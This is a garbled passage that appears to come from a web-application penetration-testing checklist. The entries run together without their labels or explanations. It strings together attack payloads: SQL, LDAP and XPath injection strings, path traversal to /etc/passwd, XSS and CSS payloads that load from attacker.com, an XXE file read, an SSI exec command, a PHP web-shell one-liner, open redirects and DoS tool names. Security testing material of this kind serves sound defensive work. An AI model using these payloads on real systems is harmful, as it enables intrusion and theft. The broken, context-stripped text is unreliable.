HttpOnly or Secure.' OR 1=1-- into the username and password fields./file?name=../../etc/passwd returns sensitive files./api/files/123 reveals unauthorized data./api/users/123 allows editing another userâs profile./download?file=../../etc/passwd accesses system files./etc/passwd.169.254.169.254./password-reset.aws-cli or third-party scanners to list bucket permissions.<style>*{background:url(http://attacker.com)</style>./search?q=term&q=malicious bypasses input validation.GET /%0D%0AHeader:malicious injects headers.\r\n sequences into HTTP parameters.{ "user": "attacker", "role": "admin" }.*)(|(user=*)) in LDAP search filters bypass authentication.*, |, and ).' OR 1=1--.<!--#exec cmd="ls"-->.<!ENTITY xxe SYSTEM "file:///etc/passwd">.http://attacker.com.username[.="admin" or "1=1"].<script>alert(document.cookie)</script> into logs.<script src="http://attacker.com/malicious.js"></script>.document.write(location.hash) with a malicious hash.innerHTML.<script>alert(1)</script> into user profiles.search?q=<script>alert(1)</script> renders the script.search?q=alert(1) reflected into a JavaScript sink.hping3 or LOIC to send a large number of requests.internal-package to public npm or PyPI.ysoserial..exe files to a document management system.https://attacker.com into a redirect parameter.next parameters to redirect users to http://attacker.com.?redirect=.http://example.com/.git/ reveals repository contents.gobuster or dirb.403 Forbidden response shows the path /var/www/html/secure/.10.0.0.1.Server header shows Apache/2.4.41.Burp Suite.username= or password=.trufflehog.http://example.com/backup.zip containing sensitive data.gobuster.http://example.com/source.php displays PHP code..php, .aspx, .java.nginx/1.19.6 displayed in the Server HTTP header.nmap or curl to enumerate version details.X-Powered-By header shows PHP/5.4.45.<?php system($_GET['cmd']); ?>.' OR 1=1 -- to bypass login authentication.' OR '1'='1.AND SLEEP(5) to confirm a vulnerability.AND 1=1 and observe behavior.* in Access-Control-Allow-Origin.dig or nslookup to enumerate DNS records./var/www/html/uploads is writable by all users.ls -la.swaks.Content-Security-Policy headers.Burp Suite.subjack.Apache Struts 2.3.15 vulnerable to RCE.nmap or banner grabbing.